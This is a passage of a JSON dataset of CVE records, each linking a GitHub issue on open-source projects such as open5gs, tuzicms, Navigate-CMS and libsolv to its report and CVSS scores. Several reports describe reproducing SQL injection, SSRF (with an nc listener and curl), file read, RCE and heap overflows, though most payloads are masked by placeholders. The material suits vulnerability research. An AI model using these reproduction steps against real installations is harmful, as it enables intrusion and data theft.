  73822. "description": "Vulnerability/BUG SQL Injection while updating details.. Hi I found a SQL injection vulnerability in your Expense Management System APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as show in image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
  73823. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73824. "severity": "CRITICAL",
  73825. "baseScore": 9.8,
  73826. "impactScore": 5.9,
  73827. "exploitabilityScore": 3.9
  73828. },
  73829. {
  73830. "CVE_ID": "CVE-2021-44108",
  73831. "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/1247",
  73832. "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/1247",
  73833. "Repo_new": "open5gs/open5gs",
  73834. "Issue_Created_At": "2021-11-16T13:10:08Z",
  73835. "description": "memory corruption and null pointer dereference. Thanks for the great project first. I have found some vulnerabilities during reading the source code. memory corruption in APITAG when nf receive sbi(http2) message with APITAG , APITAG in APITAG will try to parse all parts in the request, but the struct APITAG only have APITAG which is NUMBERTAG member, and this will cause a memory corruption to stack memory. below is a poc requests to crash the amfd(which listen on APITAG ERRORTAG null pointer dereference APITAG in amf will call APITAG in APITAG APITAG can parse a data without n2_info_container and return APITAG as null. This will skip the if on line NUMBERTAG ERRORTAG this case will not set APITAG , but on line NUMBERTAG APITAG is being dereferenced APITAG below is a poc crash amfd(this requires a live ue context, i was using ueransim to simulate a imsi NUMBERTAG here): CODETAG leommxj from Chaitin Security Research Lab.",
  73836. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  73837. "severity": "HIGH",
  73838. "baseScore": 7.5,
  73839. "impactScore": 3.6,
  73840. "exploitabilityScore": 3.9
  73841. },
  73842. {
  73843. "CVE_ID": "CVE-2021-44111",
  73844. "Issue_Url_old": "https://github.com/s-cart/s-cart/issues/102",
  73845. "Issue_Url_new": "https://github.com/s-cart/s-cart/issues/102",
  73846. "Repo_new": "s-cart/s-cart",
  73847. "Issue_Created_At": "2021-11-17T08:46:35Z",
  73848. "description": "A bug that leads to Arbitrary file download. Describe the bug cod in PATHTAG CODETAG without any filter,can Splicing the path. poc: APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG login in as admin NUMBERTAG isit the PATHTAG NUMBERTAG the file will be downloaded Screenshots FILETAG version newest NUMBERTAG",
  73849. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  73850. "severity": "MEDIUM",
  73851. "baseScore": 4.4,
  73852. "impactScore": 3.6,
  73853. "exploitabilityScore": 0.8
  73854. },
  73855. {
  73856. "CVE_ID": "CVE-2021-44138",
  73857. "Issue_Url_old": "https://github.com/maybe-why-not/reponame/issues/2",
  73858. "Issue_Url_new": "https://github.com/maybe-why-not/reponame/issues/2",
  73859. "Repo_new": "maybe-why-not/reponame",
  73860. "Issue_Created_At": "2022-04-04T11:09:53Z",
  73861. "description": "Directory traversal vulnerability in Caucho Resin. Directory traversal vulnerability in Caucho Resin, as distributed in Resin NUMBERTAG APITAG allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request. FILETAG",
  73862. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73863. "severity": "HIGH",
  73864. "baseScore": 7.5,
  73865. "impactScore": 3.6,
  73866. "exploitabilityScore": 3.9
  73867. },
  73868. {
  73869. "CVE_ID": "CVE-2021-44139",
  73870. "Issue_Url_old": "https://github.com/alibaba/Sentinel/issues/2451",
  73871. "Issue_Url_new": "https://github.com/alibaba/sentinel/issues/2451",
  73872. "Repo_new": "alibaba/sentinel",
  73873. "Issue_Created_At": "2021-11-18T05:38:15Z",
  73874. "description": "Report a Sentinel Security Vulnerability about SSRF. \u4f60\u597d\uff0c\u6211\u662fthreedr3am of APITAG Security APITAG APITAG Issue Description Type: bug report \u7531\u4e8e\u8be5\u5f00\u6e90\u9879\u76ee\u7684sentinel dashboard PATHTAG APITAG APITAG APITAG APITAG dashboard\u53d1\u8d77\u4efb\u610fGET\u8bf7\u6c42\u3002 ERRORTAG NUMBERTAG APITAG ERRORTAG Describe what happened (or what feature you want) APITAG GET\u8bf7\u6c42\u7684SSRF\u653b\u51fb\u3002 APITAG Describe what you expected to happen SSRF How to reproduce it (as minimally and precisely as possible NUMBERTAG github\u62c9\u53d6\u5f00\u6e90\u4ee3\u7801 URLTAG NUMBERTAG PATHTAG NUMBERTAG nc lvvp NUMBERTAG localhost NUMBERTAG SSRF GET\u653b\u51fb\uff0ccurl XGET ' URLTAG \u53ef\u4ee5\u770b\u5230\uff0cnc\u76d1\u542c\u5230\u4e86GET\u8bf7\u6c42 CODETAG Tell us your environment Anything else we need to know?",
  73875. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73876. "severity": "HIGH",
  73877. "baseScore": 7.5,
  73878. "impactScore": 3.6,
  73879. "exploitabilityScore": 3.9
  73880. },
  73881. {
  73882. "CVE_ID": "CVE-2021-44144",
  73883. "Issue_Url_old": "https://github.com/CroatiaControlLtd/asterix/issues/183",
  73884. "Issue_Url_new": "https://github.com/croatiacontrolltd/asterix/issues/183",
  73885. "Repo_new": "croatiacontrolltd/asterix",
  73886. "Issue_Created_At": "2021-05-21T21:15:06Z",
  73887. "description": "\ud83d\udea8 Potential Heap based Buffer Overflow. \ud83d\udc4b Hello, MENTIONTAG MENTIONTAG MENTIONTAG a potential medium severity Heap based Buffer Overflow vulnerability in your repository has been disclosed to us. Next Steps NUMBERTAG isit URLTAG for more advisory information NUMBERTAG FILETAG to validate or speak to the researcher for more assistance NUMBERTAG Propose a patch or outsource it to our community whoever fixes it gets paid. Confused or need more help? Join us on our Discord URLTAG and a member of our team will be happy to help! \ud83e\udd17 Speak to a member of our team: MENTIONTAG This issue was automatically generated by FILETAG a bug bounty board for securing open source code.",
  73888. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  73889. "severity": "CRITICAL",
  73890. "baseScore": 9.1,
  73891. "impactScore": 5.2,
  73892. "exploitabilityScore": 3.9
  73893. },
  73894. {
  73895. "CVE_ID": "CVE-2021-44150",
  73896. "Issue_Url_old": "https://github.com/tusdotnet/tusdotnet/issues/157",
  73897. "Issue_Url_new": "https://github.com/tusdotnet/tusdotnet/issues/157",
  73898. "Repo_new": "tusdotnet/tusdotnet",
  73899. "Issue_Created_At": "2021-11-22T11:42:09Z",
  73900. "description": "Tus client uses a deprecated cryptographic function to calculate the file checksums. SHA NUMBERTAG is not collision resistant, which makes it easier for context dependent attackers to conduct tampering attacks and alter the checksum which makes it possible to alter the file being uploaded itself. For a long time, it has been possible \"to find collisions for SHA1 and that thus it is not secure to use for digital signatures, file integrity, and file identification purposes\". see: URLTAG Also: URLTAG CVETAG Finding: FILETAG URLTAG URLTAG URLTAG FILETAG URLTAG",
  73901. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  73902. "severity": "HIGH",
  73903. "baseScore": 7.5,
  73904. "impactScore": 3.6,
  73905. "exploitabilityScore": 3.9
  73906. },
  73907. {
  73908. "CVE_ID": "CVE-2021-44219",
  73909. "Issue_Url_old": "https://github.com/flipped-aurora/gin-vue-admin/issues/813",
  73910. "Issue_Url_new": "https://github.com/flipped-aurora/gin-vue-admin/issues/813",
  73911. "Repo_new": "flipped-aurora/gin-vue-admin",
  73912. "Issue_Created_At": "2021-11-23T08:05:36Z",
  73913. "description": "APITAG Security Issues. gin vue admin NUMBERTAG Node \u7248\u672c APITAG Golang \u7248\u672c go NUMBERTAG bug\u63cf\u8ff0 \u53d1\u73b0\u4e86\u4e00\u4e2a\u5b89\u5168\u6f0f\u6d1e\uff0c\u5df2\u7ecf\u901a\u8fc7\u90ae\u7bb1\u8054\u7cfb\u4f60\u3002 \u4fee\u6539\u5efa\u8bae \u5f88\u597d\u4fee\u590d",
  73914. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73915. "severity": "CRITICAL",
  73916. "baseScore": 9.8,
  73917. "impactScore": 5.9,
  73918. "exploitabilityScore": 3.9
  73919. },
  73920. {
  73921. "CVE_ID": "CVE-2021-44238",
  73922. "Issue_Url_old": "https://github.com/loadream/AyaCMS/issues/2",
  73923. "Issue_Url_new": "https://github.com/loadream/ayacms/issues/2",
  73924. "Repo_new": "loadream/ayacms",
  73925. "Issue_Created_At": "2021-11-22T03:02:39Z",
  73926. "description": "APITAG NUMBERTAG has RCE vulnerability. vulnerability in PATHTAG Through code audit, it is found that the value of $code comes from the transfer parameters of form data. FILETAG Then through file_put ($file, $code) writes the passed parameters to the file. FILETAG The whole process does not filter the passed parameter $code, resulting in code execution. Reappearance NUMBERTAG login the admin and click the edit button FILETAG APITAG your malicious code FILETAG APITAG edited file is saved in PATHTAG access it. result FILETAG :",
  73927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  73928. "severity": "HIGH",
  73929. "baseScore": 7.2,
  73930. "impactScore": 5.9,
  73931. "exploitabilityScore": 1.2
  73932. },
  73933. {
  73934. "CVE_ID": "CVE-2021-44255",
  73935. "Issue_Url_old": "https://github.com/ccrisan/motioneyeos/issues/2843",
  73936. "Issue_Url_new": "https://github.com/motioneye-project/motioneyeos/issues/2843",
  73937. "Repo_new": "motioneye-project/motioneyeos",
  73938. "Issue_Created_At": "2021-11-21T15:35:01Z",
  73939. "description": "Lack of admin password leaves many publicly availble system vulnerable to RCE . As with many web based apps, the admin user can run arbitrary code on the underlying system via the web gui. While that may or may not be a security issue, and for meye use cases it probably isn\u2019t, I feel that the lack of password on the admin account has left many publicly available systems open to exploitation. I\u2019d suggest a feature to implement a random password on initial installation. Off hand, I don\u2019t really know how that would look. I may be able to implement something if I find time. Here is a link to my post about the code execution: URLTAG Long story short an admin can run arbitrary code via the option to run commands when motion is detected (obviously). Additionally, an admin can upload a backup that contains a malicious APITAG file that will execute arbitrary code.",
  73940. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  73941. "severity": "HIGH",
  73942. "baseScore": 7.2,
  73943. "impactScore": 5.9,
  73944. "exploitabilityScore": 1.2
  73945. },
  73946. {
  73947. "CVE_ID": "CVE-2021-44269",
  73948. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/110",
  73949. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/110",
  73950. "Repo_new": "dbry/wavpack",
  73951. "Issue_Created_At": "2021-11-23T17:17:36Z",
  73952. "description": "A heap Out of bounds Read in APITAG (src/pack_utils.c). Hi, I have found a heap out of bounds read bug in function APITAG base on the commit APITAG code that caused crash shows below: APITAG CODETAG Crash file: FILETAG",
  73953. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  73954. "severity": "MEDIUM",
  73955. "baseScore": 5.5,
  73956. "impactScore": 3.6,
  73957. "exploitabilityScore": 1.8
  73958. },
  73959. {
  73960. "CVE_ID": "CVE-2021-44273",
  73961. "Issue_Url_old": "https://github.com/e2guardian/e2guardian/issues/707",
  73962. "Issue_Url_new": "https://github.com/e2guardian/e2guardian/issues/707",
  73963. "Repo_new": "e2guardian/e2guardian",
  73964. "Issue_Created_At": "2021-11-20T21:40:29Z",
  73965. "description": "NUMBERTAG Missing SSL hostname check. I tried e2guardian in a virtual machine today, running it as a standalone transparent proxy with SSL MITM, with the following iptables rules that redirect traffic to it (where NUMBERTAG is the uid of the user that e2guardian runs as): CODETAG I found that e2guardian enables browser connections to sites that it should not allow. One example is FILETAG This is very serious, because anyone on the path, who can intercept the connection or poison the DNS cache and thus redirect e2guardian's outgoing connection to a host under his control, now can perform a successful MITM attack. All he needs is any valid certificate e2guardian will accept it for any host. FILETAG",
  73966. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  73967. "severity": "HIGH",
  73968. "baseScore": 7.4,
  73969. "impactScore": 5.2,
  73970. "exploitabilityScore": 2.2
  73971. },
  73972. {
  73973. "CVE_ID": "CVE-2021-44299",
  73974. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/29",
  73975. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/29",
  73976. "Repo_new": "navigatecms/navigate-cms",
  73977. "Issue_Created_At": "2021-11-25T17:38:20Z",
  73978. "description": "Reflected XSS attack in PATHTAG with the theme parameter in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the themes feature. exp APITAG FILETAG analysis PATHTAG line NUMBERTAG without any filter. CODETAG",
  73979. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  73980. "severity": "MEDIUM",
  73981. "baseScore": 5.4,
  73982. "impactScore": 2.7,
  73983. "exploitabilityScore": 2.3
  73984. },
  73985. {
  73986. "CVE_ID": "CVE-2021-44334",
  73987. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/12",
  73988. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/12",
  73989. "Repo_new": "brackeen/ok-file-formats",
  73990. "Issue_Created_At": "2021-03-26T08:44:18Z",
  73991. "description": "heap buffer overflow in APITAG at APITAG Version dev version, git clone FILETAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
  73992. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  73993. "severity": "HIGH",
  73994. "baseScore": 7.8,
  73995. "impactScore": 5.9,
  73996. "exploitabilityScore": 1.8
  73997. },
  73998. {
  73999. "CVE_ID": "CVE-2021-44335",
  74000. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/17",
  74001. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/17",
  74002. "Repo_new": "brackeen/ok-file-formats",
  74003. "Issue_Created_At": "2021-06-07T05:03:03Z",
  74004. "description": "heap buffer overflow in function APITAG at APITAG . Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
  74005. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74006. "severity": "HIGH",
  74007. "baseScore": 7.8,
  74008. "impactScore": 5.9,
  74009. "exploitabilityScore": 1.8
  74010. },
  74011. {
  74012. "CVE_ID": "CVE-2021-44339",
  74013. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/15",
  74014. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/15",
  74015. "Repo_new": "brackeen/ok-file-formats",
  74016. "Issue_Created_At": "2021-06-07T04:58:26Z",
  74017. "description": "heap buffer overflow in function APITAG at APITAG . Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
  74018. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74019. "severity": "HIGH",
  74020. "baseScore": 7.8,
  74021. "impactScore": 5.9,
  74022. "exploitabilityScore": 1.8
  74023. },
  74024. {
  74025. "CVE_ID": "CVE-2021-44342",
  74026. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/19",
  74027. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/19",
  74028. "Repo_new": "brackeen/ok-file-formats",
  74029. "Issue_Created_At": "2021-06-07T05:05:25Z",
  74030. "description": "heap buffer overflow in function APITAG at APITAG Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
  74031. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74032. "severity": "HIGH",
  74033. "baseScore": 7.8,
  74034. "impactScore": 5.9,
  74035. "exploitabilityScore": 1.8
  74036. },
  74037. {
  74038. "CVE_ID": "CVE-2021-44343",
  74039. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/18",
  74040. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/18",
  74041. "Repo_new": "brackeen/ok-file-formats",
  74042. "Issue_Created_At": "2021-06-07T05:04:12Z",
  74043. "description": "heap buffer overflow in PATHTAG Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in PATHTAG Poc Poc file is FILETAG .",
  74044. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74045. "severity": "HIGH",
  74046. "baseScore": 7.8,
  74047. "impactScore": 5.9,
  74048. "exploitabilityScore": 1.8
  74049. },
  74050. {
  74051. "CVE_ID": "CVE-2021-44347",
  74052. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/7",
  74053. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/7",
  74054. "Repo_new": "yeyinshi/tuzicms",
  74055. "Issue_Created_At": "2021-11-28T13:01:01Z",
  74056. "description": "PATHTAG has APITAG PATHTAG line NUMBERTAG public function APITAG //dump($_POST); //exit; APITAG //\u6570\u636e\u5e93\u8868\uff0c\u914d\u7f6e\u6587\u4ef6\u4e2d\u5b9a\u4e49\u4e86\u8868\u524d\u7f00\uff0c\u8fd9\u91cc\u5219\u4e0d\u9700\u8981\u5199 $id = APITAG //dump($id); //exit; if ($id==null){ $this >error('\u8bf7\u9009\u62e9\u5220\u9664\u9879\uff01'); } //\u5224\u65adid\u662f\u6570\u7ec4\u8fd8\u662f\u4e00\u4e2a\u6570\u503c if(is_array($id)){ $where = 'id APITAG APITAG \u51fd\u6570\u8fd4\u56de\u4e00\u4e2a\u7531\u6570\u7ec4\u5143\u7d20\u7ec4\u5408\u6210\u7684\u5b57\u7b26\u4e32 }else{ $where = APITAG } //dump($where); //exit; $count=$m >where($where) APITAG //\u4fee\u6539\u8868\u5355\u7528save\u51fd\u6570 if ($count NUMBERTAG this >success(\"\u6210\u529f\u5220\u9664{$count}\u6761\uff01\"); } else { $this >error('\u6279\u91cf\u5220\u9664\u5931\u8d25\uff01'); } } } This's APITAG POC: URLTAG APITAG",
  74057. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74058. "severity": "CRITICAL",
  74059. "baseScore": 9.8,
  74060. "impactScore": 5.9,
  74061. "exploitabilityScore": 3.9
  74062. },
  74063. {
  74064. "CVE_ID": "CVE-2021-44348",
  74065. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/9",
  74066. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/9",
  74067. "Repo_new": "yeyinshi/tuzicms",
  74068. "Issue_Created_At": "2021-11-28T13:04:16Z",
  74069. "description": "PATHTAG PATHTAG line NUMBERTAG public function APITAG { //\u67e5\u8be2\u6307\u5b9aid\u7684\u680f\u76ee\u4fe1\u606f APITAG APITAG >where(\"id=$id\") APITAG POC: URLTAG",
  74070. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74071. "severity": "CRITICAL",
  74072. "baseScore": 9.8,
  74073. "impactScore": 5.9,
  74074. "exploitabilityScore": 3.9
  74075. },
  74076. {
  74077. "CVE_ID": "CVE-2021-44349",
  74078. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/8",
  74079. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/8",
  74080. "Repo_new": "yeyinshi/tuzicms",
  74081. "Issue_Created_At": "2021-11-28T13:02:52Z",
  74082. "description": "PATHTAG has APITAG PATHTAG line NUMBERTAG public function APITAG //\u67e5\u8be2\u6307\u5b9aid\u7684\u680f\u76ee\u4fe1\u606f APITAG APITAG >where(\"id=$id\") >order('column_sort') APITAG POC: URLTAG",
  74083. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74084. "severity": "CRITICAL",
  74085. "baseScore": 9.8,
  74086. "impactScore": 5.9,
  74087. "exploitabilityScore": 3.9
  74088. },
  74089. {
  74090. "CVE_ID": "CVE-2021-44350",
  74091. "Issue_Url_old": "https://github.com/top-think/framework/issues/2613",
  74092. "Issue_Url_new": "https://github.com/top-think/framework/issues/2613",
  74093. "Repo_new": "top-think/framework",
  74094. "Issue_Created_At": "2021-11-29T01:27:44Z",
  74095. "description": "SQL injection vulnerability. Version NUMBERTAG APITAG Finally, error injection is triggered\uff1a FILETAG",
  74096. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74097. "severity": "CRITICAL",
  74098. "baseScore": 9.8,
  74099. "impactScore": 5.9,
  74100. "exploitabilityScore": 3.9
  74101. },
  74102. {
  74103. "CVE_ID": "CVE-2021-44351",
  74104. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/28",
  74105. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/28",
  74106. "Repo_new": "navigatecms/navigate-cms",
  74107. "Issue_Created_At": "2021-11-25T14:27:44Z",
  74108. "description": "arbitrary file read vulnerability. exp after login ,we can see our sid in cookies FILETAG for example my sid is APITAG then you can get arbitrary file by APITAG FILETAG APITAG you can get some Sensitive information such as mysql user/password analysis FILETAG FILETAG and in PATHTAG FILETAG we can rewrite bypass this filter. suggest you can use APITAG \"hacker\") rather than APITAG \"\")",
  74109. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  74110. "severity": "HIGH",
  74111. "baseScore": 7.5,
  74112. "impactScore": 3.6,
  74113. "exploitabilityScore": 3.9
  74114. },
  74115. {
  74116. "CVE_ID": "CVE-2021-44550",
  74117. "Issue_Url_old": "https://github.com/stanfordnlp/CoreNLP/issues/1222",
  74118. "Issue_Url_new": "https://github.com/stanfordnlp/corenlp/issues/1222",
  74119. "Repo_new": "stanfordnlp/corenlp",
  74120. "Issue_Created_At": "2021-11-26T09:00:27Z",
  74121. "description": "Header Manipulation. URLTAG We found 'classifier' may be contaminated on line NUMBERTAG of APITAG unvalidated data in an HTTP response header can enable cache poisoning, cross site scripting, cross user defacement, page hijacking, cookie manipulation or open redirect..It will affect on line NUMBERTAG of APITAG NUMBERTAG and NUMBERTAG have similar problems.",
  74122. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74123. "severity": "CRITICAL",
  74124. "baseScore": 9.8,
  74125. "impactScore": 5.9,
  74126. "exploitabilityScore": 3.9
  74127. },
  74128. {
  74129. "CVE_ID": "CVE-2021-44554",
  74130. "Issue_Url_old": "https://github.com/cybelesoft/virtualui/issues/1",
  74131. "Issue_Url_new": "https://github.com/cybelesoft/virtualui/issues/1",
  74132. "Repo_new": "cybelesoft/virtualui",
  74133. "Issue_Created_At": "2021-11-29T09:16:36Z",
  74134. "description": "Vulnerability User Enumeration Unauthenticated. Dear Cybele Software, My name is Daniel Morales, from the IT Security Team of ARHS Spikeseed. I recently found a vulnerability in Thinfinity APITAG that allows a malicious actor to enumerate users registered in the OS APITAG through APITAG How it works By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of APITAG Common users are administrator, admin, guest and krgtbt Payload The vulnerable vector is \" URLTAG \" where \"USERNAME\" need to be brute forced. Vulnerable versions It has been tested in APITAG version NUMBERTAG and NUMBERTAG",
  74135. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  74136. "severity": "MEDIUM",
  74137. "baseScore": 5.3,
  74138. "impactScore": 1.4,
  74139. "exploitabilityScore": 3.9
  74140. },
  74141. {
  74142. "CVE_ID": "CVE-2021-44568",
  74143. "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/425",
  74144. "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/425",
  74145. "Repo_new": "opensuse/libsolv",
  74146. "Issue_Created_At": "2020-12-13T06:41:31Z",
  74147. "description": "libsolv \u201cresolve_dependencies\u201d function two heap overflow vulnerability. Description: There is two heap overflow vulnerability in function: static int resolve_dependencies APITAG solv, int level, int disablerules, Queue dq) at src/solver.c: line NUMBERTAG line NUMBERTAG if (r >d NUMBERTAG solv >decisionmap r >p] APITAG decisionmap[p NUMBERTAG line NUMBERTAG The first bug is caused by the dangerous variable APITAG If the value of index \u201c r >p\u201d is bigger than the size of APITAG there will be a heap overflow bug. Please reproduce this issue through the following APITAG PATHTAG [resolve_dependencies NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: str2job: bad line 'update A NUMBERTAG badarch APITAG testcase_read: cannot parse command 'nall' test NUMBERTAG Results differ: install k NUMBERTAG MENTIONTAG install k m NUMBERTAG MENTIONTAG test NUMBERTAG Results differ: +install c NUMBERTAG noarch MENTIONTAG install k m NUMBERTAG MENTIONTAG c NUMBERTAG noarch MENTIONTAG +install k m NUMBERTAG MENTIONTAG setsolverflags: unknown flag APITAG setsolverflags: unknown flag 'transaction' setsolverflags: unknown flag ' APITAG ' test NUMBERTAG Results differ: install A NUMBERTAG no +install k NUMBERTAG MENTIONTAG +install k m NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb info package c NUMBERTAG noarch conflicts with k NUMBERTAG provided by k NUMBERTAG problem ca NUMBERTAG eb solution NUMBERTAG d4bc NUMBERTAG f allow k NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb solution NUMBERTAG d4bc NUMBERTAG f allow k NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb solution NUMBERTAG d4bc NUMBERTAG f allow k NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb solution NUMBERTAG deljob install name c testcase_read: cannot parse command 'solveflag>' setsolverflags: unknown flag 'yumobsol6eb' setsolverflags: unknown flag 'solution' setsolverflags: unknown flag NUMBERTAG setsolverflags: unknown flag 'deljob' setsolverflags: unknown flag 'install' setsolverflags: unknown flag 'name' setsolverflags: unknown flag 'c' str2job: bad line 'update A NUMBERTAG badarch APITAG testcase_read: cannot parse command 'nall' test NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c0 at pc NUMBERTAG fab NUMBERTAG a NUMBERTAG a6c bp NUMBERTAG ffc NUMBERTAG f NUMBERTAG sp NUMBERTAG ffc NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c0 thread T NUMBERTAG fab NUMBERTAG a NUMBERTAG a6b in resolve_dependencies PATHTAG NUMBERTAG fab NUMBERTAG a NUMBERTAG ba4 in solver_run_sat PATHTAG NUMBERTAG fab NUMBERTAG a4d NUMBERTAG a in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG fab NUMBERTAG a NUMBERTAG bf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG c0 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG fab NUMBERTAG b NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG fab NUMBERTAG a0eb9a in solver_create PATHTAG NUMBERTAG fab NUMBERTAG fc NUMBERTAG d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG fab NUMBERTAG a NUMBERTAG bf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in resolve_dependencies Shadow bytes around the buggy address NUMBERTAG c0c7fff NUMBERTAG e0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG f0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fa fa fa fa fd fd fd fd fd 